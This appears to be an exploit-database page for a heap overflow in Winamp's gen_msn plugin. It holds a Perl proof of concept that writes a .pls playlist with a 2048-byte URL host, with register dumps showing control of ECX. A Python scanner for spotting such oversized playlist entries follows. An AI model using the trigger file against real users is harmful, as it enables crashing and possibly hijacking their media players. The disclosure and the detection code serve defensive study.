0day.today - Biggest Exploit Database in the World.
==============================================
WinAmp GEN_MSN Plugin Heap Buffer Overflow PoC
==============================================

#!/usr/bin/perl
# WinAmp GEN_MSN Plugin Heap Buffer Overflow
# ------------------------------------
# Discovered by SkD (skdrat@hotmail.com) &
#                   (skd@abysssec.com)
# ------------------------------------
#
# I'm not much for posting PoCs because
# I like writing exploits for whatever
# I discover and if I don't, it's a waste.
#
# Anyway, this buffer overflow is located
# in the gen_msn plugin, which
# is basically a plugin that shows what
# song you're currently listening to
# on your PM in MSN. The plugin has over
# 800,000 downloads so it's serious..
# (http://www.winamp.com/plugins/details/144799)
# This is similar to my other recent exploit
# for VUPlayer because it uses the same point
# of the .PLS playlist file!
#
# Debug Info:
#   MOV EDI,DWORD PTR DS:[ECX+EAX*4+960]
# Regs:
#   EAX 00000003
#   ECX 41414141 <- Clear control over the register
#   EDX 007EA478
#   EBX 40000001
#   ESP 028F1DB0
#   EBP 77230459 USER32.SendMessageA
#   ESI 08FD62A8 gen_msn.08FD62A8
#   EDI 00497300 UNICODE "http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
#   EIP 08FD293C gen_msn.08FD293C
#
# Peace out.
#    _________ ___    ________
#   /   _____/|  | __\______ \
#   \_____  \ |  |/ / |    |  \
#   /        \|    <  |    `   \
#  /_______  /|__|_ \/_______  /
#          \/      \/        \/

use strict;
use warnings;

# 2048 "A" bytes placed where the playlist entry's URL host belongs
my $overflow = "\x41" x 2048;

# Write a one-entry .PLS playlist whose File1 URL carries the oversized string
open(my $pls_playlist, ">", "poc.pls") or die "Cannot open poc.pls: $!";
print $pls_playlist "[playlist]\r\n".
                    "NumberOfEntries=1\r\n".
                    "File1=http://". $overflow. "\r\n";
close $pls_playlist;
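
For defenders: the PoC's trigger is a File1 entry whose URL host is far longer than any real hostname, so a playlist can be screened before a player opens it. The checker below is an added example, not part of the original advisory or of Winamp/gen_msn; the function name scan_pls, the 1024-byte entry limit and both sample playlists are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit

MAX_ENTRY_LEN = 1024  # assumed policy limit per FileN value (not a Winamp constant)
MAX_HOST_LEN = 253    # longest valid DNS hostname
FILE_RE = re.compile(r"^File([0-9]{1,9})=(.*)$", re.IGNORECASE)
COUNT_RE = re.compile(r"^NumberOfEntries=([0-9]{1,9})$", re.IGNORECASE)

def scan_pls(data: bytes):
    """Return (line_no, reason) findings for the raw bytes of one .pls file."""
    findings = []
    lines = data.decode("latin-1").splitlines()
    if not lines or lines[0].strip().lower() != "[playlist]":
        findings.append((1, "missing [playlist] header"))
    declared, seen = None, set()
    for no, raw in enumerate(lines, 1):
        line = raw.strip()
        count = COUNT_RE.match(line)
        if count:
            declared = int(count.group(1))
            continue
        entry = FILE_RE.match(line)
        if not entry:
            continue
        seen.add(int(entry.group(1)))
        value = entry.group(2)
        if len(value) > MAX_ENTRY_LEN:
            findings.append((no, f"File entry is {len(value)} bytes"))
        if "://" in value:
            try:
                host = urlsplit(value).hostname or ""
            except ValueError:  # malformed authority, e.g. an unclosed "["
                host = ""
                findings.append((no, "unparseable URL"))
            if len(host) > MAX_HOST_LEN:
                findings.append((no, f"URL host is {len(host)} bytes"))
        if re.search(r"(.)\1{255,}", value):
            findings.append((no, "run of 256+ identical bytes"))
    if declared is not None and declared != len(seen):
        findings.append((0, "NumberOfEntries does not match File entries"))
    return findings

# Constructed samples: the first has the same shape as the file the PoC writes.
OVERSIZED = b"[playlist]\r\nNumberOfEntries=1\r\nFile1=http://" + b"A" * 2048 + b"\r\n"
BENIGN = (b"[playlist]\r\nNumberOfEntries=1\r\n"
          b"File1=http://radio.example.org:8000/stream\r\nTitle1=Test\r\nVersion=2\r\n")

if __name__ == "__main__":
    for name, blob in (("oversized", OVERSIZED), ("benign", BENIGN)):
        print(name, scan_pls(blob))
```

Line number 0 in a finding marks a file-level problem rather than a specific line.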